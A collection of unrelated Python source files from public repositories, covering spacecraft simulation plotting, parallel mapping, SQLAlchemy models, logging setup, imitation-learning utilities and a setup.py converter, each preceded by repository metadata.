fswSetupRW.create(unitTestSupport.EigenVector3d2np(rw.gsHat_B), rw.Js, 0.2)
fswSetupRW.writeConfigMessage(quatControlConfig.rwParamsInMsgName, scSim.TotalSim, dynProcessName)
#
# initialize Simulation
#
scSim.InitializeSimulationAndDiscover()
# this next call ensures that the FSW and Dynamics Message that have the same
# name are copied over every time the simulation ticks forward. This function
# has to be called after the simulation is initialized to ensure that all modules
# have created their own output/input messages declarations.
# dyn2FSWInterface.discoverAllMessages()
# fsw2DynInterface.discoverAllMessages()
#
# configure a simulation stop time time and execute the simulation run
#
scSim.ConfigureStopTime(simulationTime)
scSim.ExecuteSimulation()
#
# retrieve the logged data
#
if detumble:
# dataLr = scSim.pullMessageLogData(bdotControlConfig.outputDataName + ".torqueRequestBody", range(3))
# dataPos = scSim.pullMessageLogData(sNavObject.outputTransName + ".r_BN_N", range(3))
dataOmegaIMU = scSim.pullMessageLogData(ImuSensor.OutputDataMsg + ".AngVelPlatform", range(3))
dataMagBody = scSim.pullMessageLogData(bdotControlConfig.inputMagMeterName + ".mag_bf", range(3))
dataMagLVLH = scSim.pullMessageLogData(bdotControlConfig.inputMagMeterName + ".mag_hill", range(3))
if saturate:
dataOmegaRW = scSim.pullMessageLogData(bdotControlConfig.inputRWSpeedsName + ".wheelSpeeds", range(numRW))
np.set_printoptions(precision=16)
if sunpoint:
dataCSSArray = scSim.pullMessageLogData(cssConstellation.outputConstellationMessage + ".CosValue",
range(len(CSSOrientationList)))
dataSunVector = scSim.pullMessageLogData(sunVectorConfig.sunpointOutMsgName + ".q_des_RN", range(4))
dataOmegaRW = scSim.pullMessageLogData(quatControlConfig.inputRWSpeedsName + ".wheelSpeeds", range(numRW))
dataSigmaBN = scSim.pullMessageLogData(sNavObject.outputAttName + ".sigma_BN", range(3))
dataOmegaBN = scSim.pullMessageLogData(sNavObject.outputAttName + ".omega_BN_B", range(3))
dataSigmaBR = scSim.pullMessageLogData(attErrorConfig.outputDataName + ".sigma_BR", range(3))
#
# plot the results
#
fileName = os.path.basename(os.path.splitext(__file__)[0])
plt.close("all") # clears out plots from earlier test runs
if detumble:
plt.figure(1)
for idx in range(1, 4):
plt.plot(dataOmegaIMU[:, 0] * macros.NANO2MIN, dataOmegaIMU[:, idx] * macros.R2D,
color=unitTestSupport.getLineColor(idx, 3),
label='$\omega_' + str(idx) + '$')
plt.title('Detumbling Simulation Angular Rates', fontsize=16, fontweight='bold')
plt.legend(loc='upper right', fontsize=16)
plt.xlabel('Time (min)', fontsize=16)
plt.ylabel('Angular Rates (deg/s)', fontsize=16)
# # Mag Meter Body
# plt.figure(6)
# plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 1],
# color='blue',
# label='x')
# plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 2],
# color='red',
# label='y')
# plt.plot(dataMagBody[:, 0] * macros.NANO2HOUR, dataMagBody[:, 3],
# color='black',
# label='z')
# plt.grid(True)
# plt.legend(loc='upper right', fontsize=16)
# plt.title('Magnetic Field - Body Frame', fontsize=16)
# plt.xlabel('Time (h)', fontsize=16)
# plt.ylabel('Magnetic Field Magnitude (T)', fontsize=16)
# # Mag Meter LVLH
# plt.figure(7)
# plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 1],
# color='blue',
# label='$i_r$')
# plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 2],
# color='red',
# label='$i_{\\theta}$')
# plt.plot(dataMagLVLH[:, 0] * macros.NANO2HOUR, dataMagLVLH[:, 3],
# color='black',
# label='$i_h$')
# plt.grid(True)
# plt.legend(loc='upper right', fontsize=16)
# plt.title('Basilisk (Simple Tilted Dipole) - 90 degree inclination', fontsize=16)
# plt.xlabel('Time (h)', fontsize=16)
# plt.ylabel('Magnetic Field Magnitude (T)', fontsize=16)
if saturate:
plt.figure(2)
for idx in range(1, numRW + 1):
plt.plot(dataOmegaRW[:, 0] * macros.NANO2MIN, dataOmegaRW[:, idx] / macros.RPM,
color=unitTestSupport.getLineColor(idx, numRW),
label='$\Omega_{' + str(idx) + '}$')
plt.title('Reaction Wheel Spin Rates', fontsize=16, fontweight='bold')
plt.legend(loc='upper right', fontsize=16)
plt.xlabel('Time (min)', fontsize=16)
plt.ylabel('RW Speed [RPM]', fontsize=16)
if sunpoint:
# CSS Sensor Readings
plt.figure(1)
for idx in range(1, 15): # range(1,len(CSSList)+1) currently hardcoded. Remove when initialization block
plt.plot(dataCSSArray[:, 0] * macros.NANO2SEC, dataCSSArray[:, idx],
# color=unitTestSupport.getLineColor(idx,2),
label='CSS$_{' + str(idx) + '}$')
plt.title('CSS raw sensor readings', fontsize=12, fontweight='bold')
plt.xlabel('Time [sec]', fontsize=10, fontweight='bold')
plt.legend(fontsize=10)
plt.ylabel("CSS Voltage", fontsize=10, fontweight='bold')
# plt.figure(2)
# for idx in range(1, 5):
# plt.plot(dataSunVector[:, 0] * macros.NANO2SEC, dataSunVector[:, idx],
# color=unitTestSupport.getLineColor(idx, 4),
# label='$\\beta_{' + str(idx) + '}$')
# plt.legend(loc='lower right')
# plt.title('Sun Vector Estimation Quaternion')
# plt.xlabel('Time [sec]')
# plt.ylabel('Quaternion $\\beta_{B/R}$')
plt.figure(7)
for idx in range(1, 4):
plt.plot(dataSigmaBR[:, 0] * macros.NANO2SEC, dataSigmaBR[:, idx],
color=unitTestSupport.getLineColor(idx, 3),
label='$\sigma_' + str(idx) + '$')
plt.title('Control Error', fontsize=16, fontweight='bold')
plt.legend(loc='upper right', fontsize=16)
plt.xlabel('Time (s)', fontsize=16)
plt.ylabel('$\sigma_{B/R}$', fontsize=16)
plt.figure(4)
for idx in range(1, numRW + 1):
plt.plot(dataOmegaRW[:, 0] * macros.NANO2SEC, dataOmegaRW[:, idx] / macros.RPM,
color=unitTestSupport.getLineColor(idx, numRW),
label='$\Omega_{' + str(idx) + '}$')
plt.legend(loc='lower right')
plt.xlabel('Time [sec]')
plt.ylabel('RW Speed (RPM) ')
# plt.figure(5)
# for idx in range(1,4):
# plt.plot(dataSigmaBN[:, 0] * macros.NANO2SEC, dataSigmaBN[:, idx],
# color=unitTestSupport.getLineColor(idx, 3),
# label='$\sigma_' + str(idx) + '$')
# plt.legend(loc='lower right')
# plt.xlabel('Time [min]')
# plt.ylabel('Inertial Attitude $\sigma_{B/N}$')
plt.figure(6)
for idx in range(1,4):
plt.plot(dataOmegaBN[:, 0] * macros.NANO2SEC, dataOmegaBN[:, idx] * macros.R2D,
color=unitTestSupport.getLineColor(idx, 3),
label='$\omega_' + str(idx) + '$')
plt.legend(loc='lower right')
plt.xlabel('Time [sec]')
plt.ylabel('Angular Rates')
if show_plots:
plt.show()
# close the plots being saved off to avoid over-writing old and new figures
plt.close("all")
return numDataPoints
#
# This statement below ensures that the unit test scrip can be run as a
# stand-along python script
#
if __name__ == "__main__":
run(
True, # show_plots
False, # detumble
False, # saturate
True, # sunpoint
False, # useUnmodeledTorque
False, # useJitterSimple
False, # useRWVoltageIO
)
| 1.375 | 1 |
generators/map_parallel.py | CodyKochmann/generators | 6 | 11084 | from multiprocessing import Pool
from multiprocessing.pool import ThreadPool
from queue import Queue
from .chunks import chunks
__all__ = 'map_parallel', 'map_multicore', 'map_multithread'
def _pool_map_stream(pool_type, pipe, fn, workers):
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
p = pool_type(workers)
job_q = Queue(maxsize=int(workers*2))
try:
for chunk in chunks(pipe, workers*2):
for i in chunk:
job_q.put(p.apply_async(fn, [i]))
for i in pipe:
yield job_q.get().get()
job_q.put(p.apply_async(fn, [i]))
while not job_q.empty():
yield job_q.get().get()
finally:
p.terminate()
def map_multicore(pipe, fn, workers):
''' This streams map operations through a Pool without needing to load
the entire stream into a massive list first, like Pool.map normally
requires.
'''
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
pipe = iter(pipe)
return _pool_map_stream(Pool, **locals())
def map_multithread(pipe, fn, workers):
''' This streams map operations through a ThreadPool without needing to
load the entire stream into a massive list first, like ThreadPool.map
normally requires.
'''
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
pipe = iter(pipe)
return _pool_map_stream(ThreadPool, **locals())
def map_parallel(pipe, fn, workers):
''' This streams map operations in parallel through a pool of processes or
threads. If the os does not allow multiprocessing or the datatypes are
not serializable, operation reverts to ThreadPools
'''
assert callable(fn), fn
assert isinstance(workers, int), workers
assert workers > 0, workers
pipe = iter(pipe)
try:
for i in map_multicore(pipe, fn, workers):
yield i
except:
for i in map_multithread(pipe, fn, workers):
yield i
if __name__ == '__main__':
import random, time
def work(i):
print('working on: {}'.format(i))
time.sleep(random.random())
print('finished: {}'.format(i))
return i*2
l = G(
range(10)
).map(
float
).map_parallel(
work,
5
).print().run()
| 3.359375 | 3 |
apps/bot/classes/messages/attachments/AudioAttachment.py | Xoma163/Petrovich | 0 | 11085 | <reponame>Xoma163/Petrovich<filename>apps/bot/classes/messages/attachments/AudioAttachment.py<gh_stars>0
from apps.bot.classes.messages.attachments.Attachment import Attachment
class AudioAttachment(Attachment):
TYPE = "audio"
def __init__(self):
super().__init__(self.TYPE)
self.duration = None
def parse_vk_audio(self, event_audio):
from petrovich.settings import VK_URL
self.url = f"{VK_URL}video{event_audio['owner_id']}_{event_audio['id']}"
self.private_download_url = event_audio['url']
self.duration = event_audio['duration']
| 2.203125 | 2 |
app/models.py | TrigeekSpace/academia-bknd | 0 | 11086 | """ SQLAlchemy database models. """
from datetime import datetime
from depot.fields.sqlalchemy import UploadedFileField
from app import db
from app.util.data import many_to_many, foreign_key
from app.config import TOKEN_LEN
class User(db.Model):
""" User model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
username = db.Column(db.String(32), unique=True)
email = db.Column(db.String(64), unique=True)
password = db.Column(db.Binary(32))
join_date = db.Column(db.DateTime(), default=datetime.now)
active = db.Column(db.Boolean(), default=False)
avatar = db.Column(UploadedFileField())
self_introduction = db.Column(db.Text(), unique=True)
contribution = db.Column(db.Integer(), default=0)
job = db.Column(db.String(64), unique=True)
class Session(db.Model):
""" API session class. """
token = db.Column(db.Binary(TOKEN_LEN), primary_key=True)
user, user_id = foreign_key("User", backref_name="sessions")
class AbstractBaseGroup(object):
""" Abstract base group class. """
pass
class Group(db.Model, AbstractBaseGroup):
""" Group model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
name = db.Column(db.String(32), unique=True)
users = many_to_many("Group", "User", backref_name="groups")
introduction = db.Column(db.Text())
class Paper(db.Model):
""" Paper model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(256), unique=False)
abstract = db.Column(db.Text(), unique=False)
authors = db.Column(db.String(256), unique=False)
conference = db.Column(db.String(128), unique=False)
publish_date = db.Column(db.DateTime(), default=datetime.now) # Accurate to the day
owners = many_to_many("Paper", "User", backref_name="papers")
owngroup = many_to_many("Paper", "Group", backref_name="papers")
collectors = many_to_many("Paper", "User", backref_name="collect_papers")
paper_file = db.Column(UploadedFileField())
class Note(db.Model):
""" User model class. """
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
title = db.Column(db.String(256), unique=False)
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
author, author_id = foreign_key("User", backref_name="notes")
paper, paper_id = foreign_key("Paper", backref_name="notes")
collectors = many_to_many("Note", "User", backref_name="collect_notes")
owngroup = many_to_many("Note", "Group", backref_name="notes")
content = db.Column(db.Text(), unique=False)
annotation_file = db.Column(UploadedFileField())
class Question(db.Model):
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
provider, provider_id = foreign_key("User", backref_name="questions_asked")
titie = db.Column(db.String(256), unique=False)
description = db.Column(db.Text(), unique=False)
upvotes = many_to_many("Question", "User", backref_name="questions_upvote")
downvotes = many_to_many("Question", "User", backref_name="questions_downvote")
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
class Reply(db.Model):
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
provider, provider_id = foreign_key("User", backref_name="replies")
host_question, q_id = foreign_key("Question", backref_name="replies")
content = db.Column(db.Text())
upvotes = many_to_many("Reply", "User", backref_name="replies_upvote")
downvotes = many_to_many("Reply", "User", backref_name="replies_downvote")
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
class Comment(db.Model):
id = db.Column(db.Integer(), primary_key=True, autoincrement=True)
provider, provider_id = foreign_key("User", backref_name="comments")
host_question, q_id = foreign_key("Question", backref_name="comments")
host_reply, r_id = foreign_key("Reply", backref_name="comments")
content = db.Column(db.Text(), unique=False)
create_time = db.Column(db.DateTime(), default=datetime.now)
last_modified = db.Column(db.DateTime(), default=datetime.now)
| 2.6875 | 3 |
log.py | GregMorford/testlogging | 0 | 11087 | <filename>log.py<gh_stars>0
import logging
## Logging Configuration ##
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
ch = logging.StreamHandler() # console handler
ch.setLevel(logging.INFO)
fh = logging.FileHandler('logfile.txt')
fh.setLevel(logging.INFO)
fmtr = logging.Formatter('%(asctime)s | [%(levelname)s] | (%(name)s) | %(message)s')
fh.setFormatter(fmtr)
logger.addHandler(fh)
logger.addHandler(ch) #disable this to stop console output. This better than print statements as you can disable all console output in 1 spot instead of every print statement.
logger.critical(f'testing a critical message from {__name__}') | 3.1875 | 3 |
hackerrank/BetweenTwoSets.py | 0x8b/HackerRank | 3 | 11088 | #!/bin/python3
import os
def getTotalX(a, b):
c = 0
for i in range(max(a), min(b) + 1):
if all([i % d == 0 for d in a]) and all([d % i == 0 for d in b]):
c += 1
return c
if __name__ == "__main__":
f = open(os.environ["OUTPUT_PATH"], "w")
nm = input().split()
n = int(nm[0])
m = int(nm[1])
a = list(map(int, input().rstrip().split()))
b = list(map(int, input().rstrip().split()))
total = getTotalX(a, b)
f.write(str(total) + "\n")
f.close()
| 3.203125 | 3 |
utils.py | LlamaSi/Adaptive-PSGAIL | 10 | 11089 |
import h5py
import numpy as np
import os, pdb
import tensorflow as tf
from rllab.envs.base import EnvSpec
from rllab.envs.normalized_env import normalize as normalize_env
import rllab.misc.logger as logger
from sandbox.rocky.tf.algos.trpo import TRPO
from sandbox.rocky.tf.policies.gaussian_mlp_policy import GaussianMLPPolicy
from sandbox.rocky.tf.policies.gaussian_gru_policy import GaussianGRUPolicy
from sandbox.rocky.tf.envs.base import TfEnv
from sandbox.rocky.tf.spaces.discrete import Discrete
from hgail.algos.hgail_impl import Level
from hgail.baselines.gaussian_mlp_baseline import GaussianMLPBaseline
from hgail.critic.critic import WassersteinCritic
from hgail.envs.spec_wrapper_env import SpecWrapperEnv
from hgail.envs.vectorized_normalized_env import vectorized_normalized_env
from hgail.misc.datasets import CriticDataset, RecognitionDataset
from hgail.policies.categorical_latent_sampler import CategoricalLatentSampler
from hgail.policies.gaussian_latent_var_gru_policy import GaussianLatentVarGRUPolicy
from hgail.policies.gaussian_latent_var_mlp_policy import GaussianLatentVarMLPPolicy
from hgail.policies.latent_sampler import UniformlyRandomLatentSampler
from hgail.core.models import ObservationActionMLP
from hgail.policies.scheduling import ConstantIntervalScheduler
from hgail.recognition.recognition_model import RecognitionModel
from hgail.samplers.hierarchy_sampler import HierarchySampler
import hgail.misc.utils
from julia_env.julia_env import JuliaEnv
'''
Const
NGSIM_FILENAME_TO_ID = {
'trajdata_i101_trajectories-0750am-0805am.txt': 1,
'trajdata_i101_trajectories-0805am-0820am.txt': 2,
'trajdata_i101_trajectories-0820am-0835am.txt': 3,
'trajdata_i80_trajectories-0400-0415.txt': 4,
'trajdata_i80_trajectories-0500-0515.txt': 5,
'trajdata_i80_trajectories-0515-0530.txt': 6
}'''
NGSIM_FILENAME_TO_ID = {
'trajdata_i101_trajectories-0750am-0805am.txt': 1,
'trajdata_i101-22agents-0750am-0805am.txt' : 1
}
'''
Common
'''
def maybe_mkdir(dirpath):
if not os.path.exists(dirpath):
os.mkdir(dirpath)
def partition_list(lst, n):
sublists = [[] for _ in range(n)]
for i, v in enumerate(lst):
sublists[i % n].append(v)
return sublists
def str2bool(v):
if v.lower() == 'true':
return True
return False
def write_trajectories(filepath, trajs):
np.savez(filepath, trajs=trajs)
def load_trajectories(filepath):
return np.load(filepath)['trajs']
def filename2label(fn):
s = fn.find('-') + 1
e = fn.rfind('_')
return fn[s:e]
def load_trajs_labels(directory, files_to_use=[0,1,2,3,4,5]):
filenames = [
'trajdata_i101_trajectories-0750am-0805am_trajectories.npz',
'trajdata_i101_trajectories-0805am-0820am_trajectories.npz',
'trajdata_i101_trajectories-0820am-0835am_trajectories.npz',
'trajdata_i80_trajectories-0400-0415_trajectories.npz',
'trajdata_i80_trajectories-0500-0515_trajectories.npz',
'trajdata_i80_trajectories-0515-0530_trajectories.npz'
]
filenames = [filenames[i] for i in files_to_use]
labels = [filename2label(fn) for fn in filenames]
filepaths = [os.path.join(directory, fn) for fn in filenames]
trajs = [load_trajectories(fp) for fp in filepaths]
return trajs, labels
'''
Component build functions
'''
'''
This is about as hacky as it gets, but I want to avoid editing the rllab
source code as much as possible, so it will have to do for now.
Add a reset(self, kwargs**) function to the normalizing environment
https://stackoverflow.com/questions/972/adding-a-method-to-an-existing-object-instance
'''
def normalize_env_reset_with_kwargs(self, **kwargs):
ret = self._wrapped_env.reset(**kwargs)
if self._normalize_obs:
return self._apply_normalize_obs(ret)
else:
return ret
def add_kwargs_to_reset(env):
normalize_env = hgail.misc.utils.extract_normalizing_env(env)
if normalize_env is not None:
normalize_env.reset = normalize_env_reset_with_kwargs.__get__(normalize_env)
'''end of hack, back to our regularly scheduled programming'''
# Raunak adding an input argument for multiagent video making
def build_ngsim_env(
args,
exp_dir='/tmp',
alpha=0.001,
vectorize=True,
render_params=None,
videoMaking=False):
basedir = os.path.expanduser('~/.julia/v0.6/NGSIM/data')
filepaths = [os.path.join(basedir, args.ngsim_filename)]
if render_params is None:
render_params = dict(
viz_dir=os.path.join(exp_dir, 'imitate/viz'),
zoom=5.
)
env_params = dict(
trajectory_filepaths=filepaths,
H=args.env_H,
primesteps=args.env_primesteps,
action_repeat=args.env_action_repeat,
terminate_on_collision=False,
terminate_on_off_road=False,
render_params=render_params,
n_envs=args.n_envs,
n_veh=args.n_envs,
remove_ngsim_veh=args.remove_ngsim_veh,
reward=args.env_reward
)
# order matters here because multiagent is a subset of vectorized
# i.e., if you want to run with multiagent = true, then vectorize must
# also be true
if args.env_multiagent:
env_id = 'MultiagentNGSIMEnv'
if videoMaking:
print('RAUNAK BHATTACHARRYA VIDEO MAKER IS ON')
env_id='MultiagentNGSIMEnvVideoMaker'
alpha = alpha * args.n_envs
normalize_wrapper = vectorized_normalized_env
elif vectorize:
env_id = 'VectorizedNGSIMEnv'
alpha = alpha * args.n_envs
normalize_wrapper = vectorized_normalized_env
else:
env_id = 'NGSIMEnv'
normalize_wrapper = normalize_env
print(env_params)
env = JuliaEnv(
env_id=env_id,
env_params=env_params,
using='AutoEnvs'
)
# get low and high values for normalizing _real_ actions
low, high = env.action_space.low, env.action_space.high
env = TfEnv(normalize_wrapper(env, normalize_obs=True, obs_alpha=alpha))
add_kwargs_to_reset(env)
return env, low, high
def build_critic(args, data, env, writer=None):
if args.use_critic_replay_memory:
critic_replay_memory = hgail.misc.utils.KeyValueReplayMemory(maxsize=3 * args.batch_size)
else:
critic_replay_memory = None
critic_dataset = CriticDataset(
data,
replay_memory=critic_replay_memory,
batch_size=args.critic_batch_size,
flat_recurrent=args.policy_recurrent
)
critic_network = ObservationActionMLP(
name='critic',
hidden_layer_dims=args.critic_hidden_layer_dims,
dropout_keep_prob=args.critic_dropout_keep_prob
)
critic = WassersteinCritic(
obs_dim=env.observation_space.flat_dim,
act_dim=env.action_space.flat_dim,
dataset=critic_dataset,
network=critic_network,
gradient_penalty=args.gradient_penalty,
optimizer=tf.train.RMSPropOptimizer(args.critic_learning_rate),
n_train_epochs=args.n_critic_train_epochs,
summary_writer=writer,
grad_norm_rescale=args.critic_grad_rescale,
verbose=2,
debug_nan=True
)
return critic
def build_policy(args, env, latent_sampler=None):
if args.use_infogail:
if latent_sampler is None:
latent_sampler = UniformlyRandomLatentSampler(
scheduler=ConstantIntervalScheduler(k=args.scheduler_k),
name='latent_sampler',
dim=args.latent_dim
)
if args.policy_recurrent:
policy = GaussianLatentVarGRUPolicy(
name="policy",
latent_sampler=latent_sampler,
env_spec=env.spec,
hidden_dim=args.recurrent_hidden_dim,
)
else:
print("GaussianLatentVarMLPPolicy")
policy = GaussianLatentVarMLPPolicy(
name="policy",
latent_sampler=latent_sampler,
env_spec=env.spec,
hidden_sizes=args.policy_mean_hidden_layer_dims,
std_hidden_sizes=args.policy_std_hidden_layer_dims
)
else:
if args.policy_recurrent:
print("GaussianGRUPolicy")
policy = GaussianGRUPolicy(
name="policy",
env_spec=env.spec,
hidden_dim=args.recurrent_hidden_dim,
output_nonlinearity=None,
learn_std=True
)
else:
print("GaussianMLPPolicy")
policy = GaussianMLPPolicy(
name="policy",
env_spec=env.spec,
hidden_sizes=args.policy_mean_hidden_layer_dims,
std_hidden_sizes=args.policy_std_hidden_layer_dims,
adaptive_std=True,
output_nonlinearity=None,
learn_std=True
)
return policy
def build_recognition_model(args, env, writer=None):
if args.use_infogail:
recognition_dataset = RecognitionDataset(
args.batch_size,
flat_recurrent=args.policy_recurrent
)
recognition_network = ObservationActionMLP(
name='recog',
hidden_layer_dims=args.recognition_hidden_layer_dims,
output_dim=args.latent_dim
)
recognition_model = RecognitionModel(
obs_dim=env.observation_space.flat_dim,
act_dim=env.action_space.flat_dim,
dataset=recognition_dataset,
network=recognition_network,
variable_type='categorical',
latent_dim=args.latent_dim,
optimizer=tf.train.AdamOptimizer(args.recognition_learning_rate),
n_train_epochs=args.n_recognition_train_epochs,
summary_writer=writer,
verbose=2
)
else:
recognition_model = None
return recognition_model
def build_baseline(args, env):
return GaussianMLPBaseline(env_spec=env.spec)
def build_reward_handler(args, writer=None):
reward_handler = hgail.misc.utils.RewardHandler(
use_env_rewards=args.reward_handler_use_env_rewards,
max_epochs=args.reward_handler_max_epochs, # epoch at which final scales are used
critic_final_scale=args.reward_handler_critic_final_scale,
recognition_initial_scale=0.,
recognition_final_scale=args.reward_handler_recognition_final_scale,
summary_writer=writer,
normalize_rewards=True,
critic_clip_low=-100,
critic_clip_high=100,
)
return reward_handler
def build_hierarchy(args, env, writer=None):
levels = []
latent_sampler = UniformlyRandomLatentSampler(
name='base_latent_sampler',
dim=args.latent_dim,
scheduler=ConstantIntervalScheduler(k=args.env_H)
)
for level_idx in [1,0]:
# wrap env in different spec depending on level
if level_idx == 0:
level_env = env
else:
level_env = SpecWrapperEnv(
env,
action_space=Discrete(args.latent_dim),
observation_space=env.observation_space
)
with tf.variable_scope('level_{}'.format(level_idx)):
# recognition_model = build_recognition_model(args, level_env, writer)
recognition_model = None
if level_idx == 0:
policy = build_policy(args, env, latent_sampler=latent_sampler)
else:
scheduler = ConstantIntervalScheduler(k=args.scheduler_k)
policy = latent_sampler = CategoricalLatentSampler(
scheduler=scheduler,
name='latent_sampler',
policy_name='latent_sampler_policy',
dim=args.latent_dim,
env_spec=level_env.spec,
latent_sampler=latent_sampler,
max_n_envs=args.n_envs
)
baseline = build_baseline(args, level_env)
if args.vectorize:
force_batch_sampler = False
if level_idx == 0:
sampler_args = dict(n_envs=args.n_envs)
else:
sampler_args = None
else:
force_batch_sampler = True
sampler_args = None
sampler_cls = None if level_idx == 0 else HierarchySampler
algo = TRPO(
env=level_env,
policy=policy,
baseline=baseline,
batch_size=args.batch_size,
max_path_length=args.max_path_length,
n_itr=args.n_itr,
discount=args.discount,
step_size=args.trpo_step_size,
sampler_cls=sampler_cls,
force_batch_sampler=force_batch_sampler,
sampler_args=sampler_args,
optimizer_args=dict(
max_backtracks=50,
debug_nan=True
)
)
reward_handler = build_reward_handler(args, writer)
level = Level(
depth=level_idx,
algo=algo,
reward_handler=reward_handler,
recognition_model=recognition_model,
start_itr=0,
end_itr=0 if level_idx == 0 else np.inf
)
levels.append(level)
# by convention the order of the levels should be increasing
# but they must be built in the reverse order
# so reverse the list before returning it
return list(reversed(levels))
'''
setup
'''
def latest_snapshot(exp_dir, phase='train'):
snapshot_dir = os.path.join(exp_dir, phase, 'log')
snapshots = glob.glob('{}/itr_*.pkl'.format(snapshot_dir))
latest = sorted(snapshots, reverse=True)[0]
return latest
def set_up_experiment(
exp_name,
phase,
exp_home='../../data/experiments/',
snapshot_gap=5):
maybe_mkdir(exp_home)
exp_dir = os.path.join(exp_home, exp_name)
maybe_mkdir(exp_dir)
phase_dir = os.path.join(exp_dir, phase)
maybe_mkdir(phase_dir)
log_dir = os.path.join(phase_dir, 'log')
maybe_mkdir(log_dir)
logger.set_snapshot_dir(log_dir)
logger.set_snapshot_mode('gap')
logger.set_snapshot_gap(snapshot_gap)
log_filepath = os.path.join(log_dir, 'log.txt')
logger.add_text_output(log_filepath)
return exp_dir
'''
data utilities
'''
def compute_lengths(arr):
sums = np.sum(np.array(arr), axis=2)
lengths = []
for sample in sums:
zero_idxs = np.where(sample == 0.)[0]
if len(zero_idxs) == 0:
lengths.append(len(sample))
else:
lengths.append(zero_idxs[0])
return np.array(lengths)
def normalize(x, clip_std_multiple=np.inf):
mean = np.mean(x, axis=0, keepdims=True)
x = x - mean
std = np.std(x, axis=0, keepdims=True) + 1e-8
up = std * clip_std_multiple
lb = - std * clip_std_multiple
x = np.clip(x, lb, up)
x = x / std
return x, mean, std
def normalize_range(x, low, high):
low = np.array(low)
high = np.array(high)
mean = (high + low) / 2.
half_range = (high - low) / 2.
x = (x - mean) / half_range
x = np.clip(x, -1, 1)
return x
def load_x_feature_names(filepath, ngsim_filename):
print(filepath)
f = h5py.File(filepath, 'r')
xs = []
traj_id = NGSIM_FILENAME_TO_ID[ngsim_filename]
# in case this nees to allow for multiple files in the future
traj_ids = [traj_id]
for i in traj_ids:
if str(i) in f.keys():
xs.append(f[str(i)])
else:
raise ValueError('invalid key to trajectory data: {}'.format(i))
x = np.concatenate(xs)
feature_names = f.attrs['feature_names']
return x, feature_names
def load_data(
filepath,
act_keys=['accel', 'turn_rate_global'],
ngsim_filename='trajdata_i101_trajectories-0750am-0805am.txt',
debug_size=None,
min_length=50,
normalize_data=True,
shuffle=False,
act_low=-1,
act_high=1,
clip_std_multiple=np.inf):
# loading varies based on dataset type
x, feature_names = load_x_feature_names(filepath, ngsim_filename)
# optionally keep it to a reasonable size
if debug_size is not None:
x = x[:debug_size]
if shuffle:
idxs = np.random.permutation(len(x))
x = x[idxs]
# compute lengths of the samples before anything else b/c this is fragile
lengths = compute_lengths(x)
# flatten the dataset to (n_samples, n_features)
# taking only the valid timesteps from each sample
# i.e., throw out timeseries information
xs = []
for i, l in enumerate(lengths):
# enforce minimum length constraint
if l >= min_length:
xs.append(x[i,:l])
x = np.concatenate(xs)
# split into observations and actions
# redundant because the environment is not able to extract actions
obs = x
act_idxs = [i for (i,n) in enumerate(feature_names) if n in act_keys]
act = x[:, act_idxs]
if normalize_data:
# normalize it all, _no_ test / val split
obs, obs_mean, obs_std = normalize(obs, clip_std_multiple)
# normalize actions to between -1 and 1
act = normalize_range(act, act_low, act_high)
else:
obs_mean = None
obs_std = None
return dict(
observations=obs,
actions=act,
obs_mean=obs_mean,
obs_std=obs_std,
)
| 1.414063 | 1 |
setup_py_upgrade.py | asottile/setup-py-upgrade | 87 | 11090 | <reponame>asottile/setup-py-upgrade<filename>setup_py_upgrade.py
import argparse
import ast
import configparser
import io
import os.path
from typing import Any
from typing import Dict
from typing import Optional
from typing import Sequence
METADATA_KEYS = frozenset((
'name', 'version', 'url', 'download_url', 'project_urls', 'author',
'author_email', 'maintainer', 'maintainer_email', 'classifiers',
'license', 'license_file', 'description', 'long_description',
'long_description_content_type', 'keywords', 'platforms', 'provides',
'requires', 'obsoletes',
))
OPTIONS_AS_SECTIONS = (
'entry_points', 'extras_require', 'package_data', 'exclude_package_data',
)
OPTIONS_KEYS = frozenset((
'zip_safe', 'setup_requires', 'install_requires', 'python_requires',
'use_2to3', 'use_2to3_fixers', 'use_2to3_exclude_fixers',
'convert_2to3_doctests', 'scripts', 'eager_resources', 'dependency_links',
'tests_require', 'include_package_data', 'packages', 'package_dir',
'namespace_packages', 'py_modules', 'data_files',
# need special processing (as sections)
*OPTIONS_AS_SECTIONS,
))
FIND_PACKAGES_ARGS = ('where', 'exclude', 'include')
def is_setuptools_attr_call(node: ast.Call, attr: str) -> bool:
return (
# X(
(isinstance(node.func, ast.Name) and node.func.id == attr) or
# setuptools.X(
(
isinstance(node.func, ast.Attribute) and
isinstance(node.func.value, ast.Name) and
node.func.value.id == 'setuptools' and
node.func.attr == attr
)
)
class Visitor(ast.NodeVisitor):
def __init__(self) -> None:
self.sections: Dict[str, Dict[str, Any]] = {}
self.sections['metadata'] = {}
self.sections['options'] = {}
self._files: Dict[str, str] = {}
def visit_With(self, node: ast.With) -> None:
# with open("filename", ...) as fvar:
# varname = fvar.read()
if (
# with open(...)
len(node.items) == 1 and
isinstance(node.items[0].context_expr, ast.Call) and
isinstance(node.items[0].context_expr.func, ast.Name) and
node.items[0].context_expr.func.id == 'open' and
# "filename"
len(node.items[0].context_expr.args) > 0 and
isinstance(node.items[0].context_expr.args[0], ast.Str) and
# as fvar
isinstance(node.items[0].optional_vars, ast.Name) and
# varname =
len(node.body) == 1 and
isinstance(node.body[0], ast.Assign) and
len(node.body[0].targets) == 1 and
isinstance(node.body[0].targets[0], ast.Name) and
# fvar.read()
